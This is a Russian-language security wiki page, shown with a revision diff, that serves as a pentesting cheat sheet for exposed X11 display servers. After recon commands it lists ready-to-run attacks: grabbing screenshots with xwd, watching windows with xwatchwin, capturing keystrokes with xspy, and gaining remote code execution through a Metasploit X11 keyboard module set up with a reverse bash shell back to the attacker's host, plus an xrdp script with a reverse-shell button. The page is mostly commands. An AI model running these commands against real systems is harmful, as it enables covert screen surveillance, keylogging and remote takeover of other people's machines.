X11 all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м (→Ссылки) |
Drakylar (обсуждение | вклад) м (→Ссылки) |
||
Строка 82: | Строка 82: | ||
[https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал] | [https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал] | ||
+ | |||
[https://book.hacktricks.xyz/pentesting/6000-pentesting-x11 Подробный туториал] | [https://book.hacktricks.xyz/pentesting/6000-pentesting-x11 Подробный туториал] |
Текущая версия на 13:24, 30 апреля 2020
Содержание
Разведка
Поиск сервиса
nmap
1 nmap target -p 6000 --script x11-access
Проверка подключения
xdpyinfo
1 xdpyinfo -display <ip>:<display>
Информация об окнах
xwininfo
1 xwininfo -root -tree -display target:0
Атаки
Скриншоты
xwd
1 xwd -root -screen -silent -display target:0 > screenshot.xwd
2 convert screenshot.xwd screenshot.png
Слежка за экраном
xwatchwin
1 ./xwatchwin target:0 -w window_id
Сниффер
Сниффать нажатия
xspy
1 xspy target
RCE
x11_keyboard_exec
1 use unix/x11/x11_keyboard_exec
2 set rhost target
3 set payload cmd/unix/reverse_bash
4 set lhost myip
5 set lport myport
6 set time_wait 10
7 run
xrdp
1 ./xrdp.py <target:0> --no-disp
Там будет кнопка R-Shell